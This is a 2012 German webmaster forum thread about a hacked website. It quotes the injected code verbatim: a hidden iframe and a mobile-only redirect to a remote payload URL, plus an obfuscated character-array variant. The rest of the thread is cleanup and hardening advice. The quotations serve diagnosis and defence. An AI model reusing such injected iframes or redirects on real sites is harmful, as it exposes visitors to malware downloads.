gehacked - Strategie danach?

Beitrag von **depp ich** » 12.03.2012, 09:54

Gestern hat ein Dumpfsack an alle Seiten unten ein Stückchen Code angehängt:

<iframe name="SagUTeXYne" src="http&#58;//aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>
<script type="text/javascript">
<!--
if&#40;navigator.userAgent.match&#40;/&#40;android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone&#41;/i&#41;!==null&#41;&#123;
  window.location = "http&#58;//geie.net/load/u/2493/load.auto";
&#125;
//-->
</script>

Fiel bei den meisten Seiten nur durch längere Ladezeit auf, bei ein paar kam es zu php-Fehlermeldungen.

Der unmittelbare Schaden war schnell behoben, das gesamte Werkel durchsehen und ev. Backup einspielen wird mehr arbeit sein.

Ja - die Frage:
Wie kommen die Hacker überhaupt rein? (über FTP?)
Macht es Sinn, den FTP-Zugang zu ändern?

Wenn über ein Script - wo soll ich suchen? Zeitlich passen würde ein PagePeel-Script, das ich vor ein paar Tagen aktiviert habe.

Das verwendete CMS hat bekannte Lücken, allerdings wurde damit noch nie so eine Art Angriff gemacht. Der Hacker schien gar nicht zu wissen, welches CMS da läuft. Die Datenbank ist unberührt.

Ich möchte jetzt keinen großen Panik!-Rumdumallesneu-Schlag machen. Das ist keine Site, wo es irgendwas tolles zum holen gibt. Loch zu und genug wäre mir lieber.

von **Anzeige von ABAKUS** »

SEO Consulting bei ABAKUS Internet Marketing
Erfahrung seit 2002

persönliche Betreuung
individuelle Beratung
kompetente Umsetzung

Jetzt anfragen: 0511 / 300325-0.

Beitrag von **bbnetch** » 12.03.2012, 10:34

ist ein iframe und eine mobile umleitung.
die seite die vom iframe aufgerufen wird, hat auch so ein code drin, allerdings ist dort das script zerstueckelt.

also diese seite leitet auch gleich um.
https://aandmcleaning.co.uk
im footer hat sie fast den selben code, nur zerstueckeltes javascript

Code: Alles auswählen

<iframe name="SagUTeXYne" src="http&#58;//aandmcleaning.co.uk/templates/rhuk_milkyway/lite/index.php?out=1328461192" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe><script>a=new Array&#40;'<','s','c','r','i','p','t','>',' ','v','a','r',' ','S','t','r','=','"','k','_','m','i','l','k','y','w','a','y','/','l','i','t','e','/','i','n','d','e','x','.','p','h','p','?','o','u','t','=','1','3','2','8','4','6','1','1','9','2','h','t','t','p','&#58;','/','/','a','a','n','d','m','c','l','e','a','n','i','n','g','.','c','o','.','u','k','/','t','e','m','p','l','a','t','e','s','/','r','h','u','"','','','','','d','o','c','u','m','e','n','t','.','w','r','i','t','e','&#40;','S','t','r','.','s','u','b','s','t','r','i','n','g','&#40;','4','0',',','8','1','&#41;',',','S','t','r','.','s','u','b','s','t','r','i','n','g','&#40;','0',',','4','0','&#41;','&#41;',' ','<','/','s','c','r','i','p','t','>'&#41;;document.write&#40;a.join&#40;''&#41;&#41;</script>

erzeugt irgendein "clickout", sieht aus wie refspam, oder ne topliste die hochgeklickt werden soll, allerdings laedt die zielseite nicht.

wie das reinkommt?
wenns ein blog oder so ist, wahrscheinlich durch eine sicherheitsluecke, da giebts 100 wege wenn du nicht immer die neusten sicherheitsupdates einspielst.
durch ftp eher weniger, waere zu aufwendig.
trotzdem wuerd ich mal ganz genau hinschauen, weil da hst bestimmt irgendwo noch mehr zeugs, das den ganzen scheiss in deine seiten reinschreibt.
irgendwo versteckt, oder sogar in anderen daten drin.

Beitrag von **holgi74** » 12.03.2012, 11:35

Schadcode wird meist durch Sicherheitslücken eingeschleust.
In Wordpress Blogs wurde vor einiger Zeit durch eine Lücke in Timthumb Schadcode in index.php eingefügt.

Hatte dadurch ne Menge Arbeit.

Beitrag von **Ehrenwert** » 17.03.2012, 11:10

Plan: Backup einspielen, ggf. Updates des CMS vornehmen, FTP-User und PW ändern (User, wenn Hoster dies vorsieht), eigene Erweiterungen auf Lücken wie mgl. MySQL-injections prüfen oder prüfen lassen.

Finger weg von Scripten, die in irgendeiner Form auf Warez-Seiten zu finden sind. Hier sind häufig Hintertürchen eingebaut - vom rechtlichen Aspekt einmal ganz abgesehen

Beitrag von **Provocateur** » 17.03.2012, 18:57

Ich hatte das auch mal. Da hatte ich mir wohl Viren eingefangen, die dann, nachdem ich mich über ftp verbunden habe, all meine "Index" Dateien auf dem Webspace infiziert haben. Ging scheinbar automatisch. Deshalb würde ich raten erstmal deinen Rechner zu prüfen..